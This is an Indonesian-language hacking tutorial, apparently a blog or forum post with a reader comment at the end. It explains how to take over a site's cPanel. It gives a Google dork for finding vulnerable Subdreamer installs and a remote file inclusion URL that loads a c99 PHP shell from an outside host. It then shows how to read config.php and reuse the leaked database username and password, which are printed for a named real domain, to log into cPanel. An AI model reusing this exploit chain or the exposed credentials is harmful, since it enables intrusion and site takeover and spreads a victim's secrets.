Hacking Cpnel dengan c99

sedikit info hack nih buat teman2
siapa tau bermanfaat. dicoba aja
iseng-iseng buat artikel tentang hacking cpanel dengan memakai script
injeksi c99, . btw pertanyaannya apakah Cpanel itu ? yups Cpanel
adalah merupakan pusat dari manajemen web site, CPanel atau istilah
kerennya Control Panel adalah tempat dimana admin web untuk melakukan
setting penuh dan control terhadap web yang akan dibuat atau istilahnya
adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah
disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi
rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa
dikategorikan sebagai script web, script mail, script MySql, dll.
Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang
bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa
dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada
dalam control sang hacker [ maaf saya bukan hacker J ] atau bila
dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain
maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap
rumah kita. tapi apakah mudah rumah kita orang lain bisa masuk kerumah
kita sedangkan rumah kita ada pengaman yaitu KUNCI, yups sama saja
dengan CPANEL tidak semudah yang kita bayangkan karena untuk masuk ke
area CPANEL membutuhkan kunci yaitu Username dan password, bila tidak
maka anda dipastikan tidak akan bisa masuk ke dalam area CPANEL
tersebut. Cukup jelas logika kita untuk berpikir , so sekarang kembali
lagi ke pokok permasalahannya, penulis akan menerangkan pengambilan
alih cpanel terhadap web target memakai kesalahan dari script logika
pemograman dan kesalahan dari admin web tersebut, J
btw kita mulai penulis akan ambil suatu bug yang ada di script php dengan merk ‘subdreamer’ [ bisa diliat di www.subdreamer.com
], bug yang ada adalah : /skins/advanced/advanced2.php?pluginpath[0]=
dengan file yang bermasalah adalah advanced2.php, kita akan coba cari
target dengan memakai paman google.com dengan syntax : inurl:’
skins/advanced/advanced1.php?’, penulis ambil contoh situs luar
negeri [ sebelumnya sudah member tahukan bug ke mail mereka sesuai
dengan etika hacker ] J yaitu : http://www.cafesjakie.nl
Kita coba lakukan penetrasi terhadap situs target, dengan memakai phpshell maka akan didapat hasil :
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? Maka akan Nampak hasil seperti dibawah ini :

Ok’s kita berhasil masuk lewat belakang [ backdoor ] tetapi kita
belum mendapat akses utama [ cpanel ] hanya bisa masuk lewat pintu
belakang, so kita coba cari dimana letak akses utama [ cpanel ],
perhatikan satu persatu file yang ada, kita bisa liat di atas file
phpshell kita


Bahwa target berada
di posisi safe-mode : OFF, dan disana kita bisa liat uid:65534(nobody),
gid=65534(nobody), groups=65534(nobody) dengan user : gbremmer, good
awal yang bagus untuk kita coba cari akses cpanel pada web target
tersebut [bila belum mengerti akan uid,gid,groups bisa mempelajari OS
berbasis open Source seperti LInUX, I love linux ], lanjut perhatikan
di atas disana ada file /home/gremmer/public_html/skins/advanced, kita
akan coba mendapatkan akses cpanel coba masuk ke halaman utama web
target tersebut , klik folder public_html atau bila anda seorang admin
web ,folder public_html = www , maka akan didapat hasil di bawah ini :



Perhatikan dengan
seksama folder-folder tersebut, kita akan berpikir secara logika bahwa
untuk menghubungkan database memerlukan suatu username dan password,
biasanya letak keduanya berada dalam file config.php,
configuration.php, koneksi.php [ tergantung dari pembuat script
tersebut ], penulis coba kita akan klik folder includes [ biasanya
secara default letak config.php di script subdreamer ada di dalam
folder includes], maka akan didapat hasil :


Perhatikan disana ada 2 file yaitu config.php dan config.php.new,
btw kita bisa liat ke-2 nya, hanya ada perbedaannya yaitu masalah byte
–nya [ kemungkinan config.php.new hanya untuk update saja ], klik
config.php maka akan didapat hasil :
Blah perhatikan lagi didalam file config.php kita bisa melihat
databse user lengkap dengan passwornya , Cuma disini kita tidak akan
masuk ke dalam database tersebut karena kita akan mencoba mendapatkan
akses utama yaitu cpanel web target, perhatikan dengan seksama di
$dbname = gbremmer_subdreamer
$dbusername = gbremmer_subdrea, so secara logika gbremmer adalah
nama dari user tersebut dan dibelakangnya adalah default nama dari
hosting tersebut, dan perhatikan sekali lagi file $dbpassword =
hiervomgb, merupakan dari password user tersebut untuk masuk kedalam
database web target, stop, pertanyaannya apakah kita bisa masuk ke
cpanel target tersebut ? pertanyaan yang bagus, disini penulis akan
mengajak anda berpikir secara logika, pernahkah anda merasa aman untuk
melakukan aktivitas di dunia maya [ internet ]? Untuk orang awam
mungkin ini adalah pertanyaan yang bodoh, mungkin orang akan berpikir
akan aman dan nyaman untuk urusan dunia internet [ hampir 80 % yang
mengatakan demikian, sehingga untuk urusan password hanya satu password
untuk banyak keperluan ] J, karena kita berpikiran begitu maka
disinilah letak kesalahan dari kita sendiri [ tidak pernah mau tahu
untuk urusan keamanan dalam internet ], so kembali ke akar
permasalahannya, kita akan berpikir terbalik dari kebanyakan orang awam
, kita akan coba memakai user name : gbremmer dan password : hiervomgb
untuk mendapatkan akses utama dari cpanel target tersebut.
Mari kita buka URL : http://www.cafesjakie.nl/cpanel, liat halaman cpanel terproteksi oleh user name dan password ,


Bingung kan ? J, kita akan coba memasukkan username dan password yang kita dapat dari file config.php



Blar liatlah kita
dapat memasuki cpanel target tersebut, dapat secara full melakukan
control terhadapa admin tersebut hanya dengan bermodalkan logika tanpa
harus susah payah J karena memakai kesalahan dari logika script
pemograman dan dari admin tersebut [padahal penulis juga salah satu
admin web di www.sekuritionline.net ]

Note :
- Belajar menjadi hacker adalah sesuatu yang menyenangkan yang susah
adalah etika –nya- - Bila berhasil memasuki web target usahakan untuk
memberi tahukan ke pihak yang terkait agar dapat dilakukan patch
terhadap web tersebut [ sekalian minta donasi via e-gold ] J xixixixiix
- Jadikan hacking is art jangan merusak [ kecuali kalo kepepet ]J just kidding J
- Jadikan pembelajaran untuk admin web bila kena webnya kena Deface ga
usah lapor ke pihak berwenang [ ntar malah ngeluarin duit banyak JJJ
- Untuk admin selalu lakukan update patch secara otomatis atau manual,
serta lakukan backup data web secara teraturJ ]

brow...mw tanya ney...

Loe familiar ma linux g??
Scanner bUg di lInux apaan y??
kyk klo window acunetix dll...
Gwe bingung ny nyari scanner...

hehe